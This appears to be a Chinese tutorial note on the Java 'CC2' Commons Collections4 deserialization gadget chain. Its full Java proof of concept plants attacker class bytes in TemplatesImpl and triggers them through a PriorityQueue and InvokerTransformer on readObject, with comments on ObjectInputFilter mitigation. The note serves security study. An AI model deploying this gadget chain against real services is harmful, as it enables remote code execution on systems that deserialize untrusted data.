Java反序列化CommonsCollections篇CC2

CC2链和CC4链几乎一样：CC4里用InstantiateTransformer去实例化TrAXFilter的那一步，在CC2里换成了直接用InvokerTransformer调用newTransformer，其他部分没有变化。

CC4:  
Transformer[] transformers = new Transformer[]{  
new ConstantTransformer(TrAXFilter.class),  
new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates})  
};  
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

CC2:  
InvokerTransformer<Object,Object> invokerTransformer = new InvokerTransformer<>("newTransformer", new Class[]{}, new Object[]{});

调用链

完整代码

package com.LE0;  
  
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;  
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;  
import org.apache.commons.collections4.Transformer;  
import org.apache.commons.collections4.comparators.TransformingComparator;  
import org.apache.commons.collections4.functors.ChainedTransformer;  
import org.apache.commons.collections4.functors.ConstantTransformer;  
import org.apache.commons.collections4.functors.InstantiateTransformer;  
import org.apache.commons.collections4.functors.InvokerTransformer;  
  
import javax.xml.transform.Templates;  
import java.io.IOException;  
import java.io.ObjectInputStream;  
import java.io.ObjectOutputStream;  
import java.lang.reflect.Field;  
import java.nio.file.Files;  
import java.nio.file.Paths;  
import java.util.PriorityQueue;  
  
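/**
 * Demo of the CommonsCollections "CC2" deserialization chain (commons-collections4).
 *
 * <p>The payload is a {@link PriorityQueue} whose comparator is a
 * {@code TransformingComparator} wrapping an {@code InvokerTransformer("newTransformer")}.
 * When the queue is deserialized it re-orders its elements through that comparator, which
 * invokes {@code newTransformer()} on the queued {@code TemplatesImpl}; that in turn defines
 * and instantiates the class held in {@code _bytecodes}.
 *
 * <p>Defender's note: the sink is an unfiltered {@code ObjectInputStream.readObject()} on
 * bytes the reader does not trust. The standard mitigation is an {@code ObjectInputFilter}
 * (JDK 9+, {@code ObjectInputStream.setObjectInputFilter} or the {@code jdk.serialFilter}
 * property) that rejects the gadget classes, or not using Java native serialization at all.
 */
public class CC2 {
    /** Default location the serialized payload is written to and read back from. */
    private static final String DEFAULT_OUTPUT = "ser.bin";

    /**
     * Builds the payload, serializes it and immediately deserializes it locally.
     *
     * @param args optional: {@code args[0]} overrides the hard-coded path of the class file
     *             whose bytes are placed into {@code TemplatesImpl._bytecodes}
     * @throws Exception reflection, I/O or deserialization failures propagate unchanged
     */
    public static void main(String[] args) throws Exception {
        // Path was hard-coded in the original; allow it to be passed in without changing the default.
        String classFile = args.length > 0 ? args[0] : "D:\\code\\java\\Evil.class";

        TemplatesImpl templates = new TemplatesImpl();

        // TemplatesImpl.newTransformer() requires a non-null _name and the class bytes in
        // _bytecodes; both are private, so they are populated via reflection.
        Class<?> tc = templates.getClass();
        Field name = tc.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates, "LE0");
        Field bytecodes = tc.getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);

        byte[] code = Files.readAllBytes(Paths.get(classFile));
        byte[][] codes = {code};
        bytecodes.set(templates, codes);

        // CC2 differs from CC4 here: no InstantiateTransformer/TrAXFilter step, the transformer
        // calls newTransformer() on whatever object the comparator hands it.
        InvokerTransformer<Object, Object> invokerTransformer =
                new InvokerTransformer<>("newTransformer", new Class[]{}, new Object[]{});

        // Start with a harmless ConstantTransformer: PriorityQueue.add() already runs the
        // comparator, and using the InvokerTransformer at this point would fire the chain
        // locally instead of at deserialization time.
        TransformingComparator transformingComparator = new TransformingComparator(new ConstantTransformer(1));
        PriorityQueue<Object> priorityQueue = new PriorityQueue<>(transformingComparator);

        // Two elements are needed so that re-ordering on deserialization actually compares them.
        priorityQueue.add(templates);
        priorityQueue.add(2);

        // Only now swap the real transformer in; the field is private, hence reflection again.
        // Statement order above is load-bearing — do not move this before the add() calls.
        Class<?> t = transformingComparator.getClass();
        Field transformerField = t.getDeclaredField("transformer");
        transformerField.setAccessible(true);
        transformerField.set(transformingComparator, invokerTransformer);

        serialize(priorityQueue);
        deserialize(DEFAULT_OUTPUT);
    }

    /**
     * Serializes {@code obj} to the default file {@value #DEFAULT_OUTPUT}.
     *
     * @param obj object graph to write
     * @throws IOException if the file cannot be created or written
     */
    public static void serialize(Object obj) throws IOException {
        serialize(obj, DEFAULT_OUTPUT);
    }

    /**
     * Serializes {@code obj} to {@code filename}.
     *
     * @param obj      object graph to write
     * @param filename path of the output file
     * @throws IOException if the file cannot be created or written
     */
    public static void serialize(Object obj, String filename) throws IOException {
        // try-with-resources: the original never closed the stream, so the trailing bytes
        // could be left unflushed and the file handle leaked.
        try (ObjectOutputStream oos = new ObjectOutputStream(Files.newOutputStream(Paths.get(filename)))) {
            oos.writeObject(obj);
        }
    }

    /**
     * Deserializes the object graph stored in {@code filename}.
     *
     * <p>This is the vulnerable sink the demo exercises: {@code readObject()} runs with no
     * {@code ObjectInputFilter}, so any gadget chain present in the bytes executes during
     * the call. Code that must read untrusted bytes should install a filter via
     * {@code ObjectInputStream.setObjectInputFilter} before calling {@code readObject()}.
     *
     * @param filename path of the serialized file
     * @return the deserialized root object
     * @throws IOException            if the file cannot be read
     * @throws ClassNotFoundException if a class in the stream is not on the classpath
     */
    public static Object deserialize(String filename) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(Files.newInputStream(Paths.get(filename)))) {
            return ois.readObject();
        }
    }
}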